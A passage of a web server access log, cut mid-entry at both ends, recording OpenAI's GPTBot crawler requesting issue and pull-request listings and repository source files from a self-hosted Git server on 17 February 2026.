GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 21787] [Gzip 5.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 16938] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 21818] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 16972] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:19:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:19:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:19:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:19:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11771] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:19:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:19:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11217] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:19:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11202] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:19:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 